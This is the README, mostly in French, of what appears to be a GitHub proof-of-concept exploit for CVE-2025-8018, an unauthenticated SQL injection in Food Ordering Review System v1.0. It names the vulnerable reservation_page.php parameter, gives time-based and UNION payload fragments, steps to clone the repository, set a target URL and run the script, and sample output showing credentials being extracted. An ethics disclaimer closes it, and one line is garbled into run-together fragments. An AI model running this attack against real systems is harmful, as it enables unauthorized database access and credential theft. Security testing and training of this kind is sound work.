
Exploit PoC Python pour CVE-2025-8018, une injection SQL critique non authentifiée dans Food Ordering Review System v1.0. Prend en charge l'extraction de données par aveugle basée sur le temps et par UNION pour le hacking éthique et la formation CTF.
Ce dépôt fournit une preuve de concept (PoC) en Python pour CVE‑2025‑8018, une vulnérabilité de type injection SQL de haute sévérité découverte dans le Système de révision des commandes alimentaires v1.0. La vulnérabilité est déclenchée via le paramètre reg_Id dans reservation_page.php.
/user/reservation_page.phpreg_Idusers, sans authentificationSLEEP()UNION SELECT NULL,NULL,...requestsInstaller les dépendances :
pip install requests
Comment utiliser
Clonez le dépôt :
git clone https://github.com/drackyjr/CVE-2025-8018.git
cd CVE-2025-8018
Mettez à jour l'URL cible :
Ouvrez cve-2025-8018.py et modifiez :
TARGET_URL = "http://TARGET-IP/user/reservation_page.php"
Replace TARGET-IP with the actual address of the vulnerable system.
Exécutez le script d'exploit :
python3 cve-2025-8018.py
Sortie
[*] Checking time-based SQLi with payload: 1 AND SLEEP(5)--
[+] Blind SQL injection confirmed!
[*] Testing how many columns the query expects...
[+] Looks like 3 columns work!
[*] Trying to extract data using UNION-based SQL injection...
[+] Found potential credentials in the response!
[*] Trying blind extraction fallback...
[+] Username is 7 characters long!
⚠️ Avertissement
Cette preuve de concept est fournie strictement à des fins éducatives, telles que des défis CTF, des formations en cybersécurité ou des tests de défense sur vos propres systèmes.
N'utilisez pas cela contre des systèmes de production ou des systèmes pour lesquels vous n'avez pas d'autorisation explicite de tester. L'auteur et toute partie associée ne sont pas responsables d'une mauvaise utilisation ou des dommages résultant du code.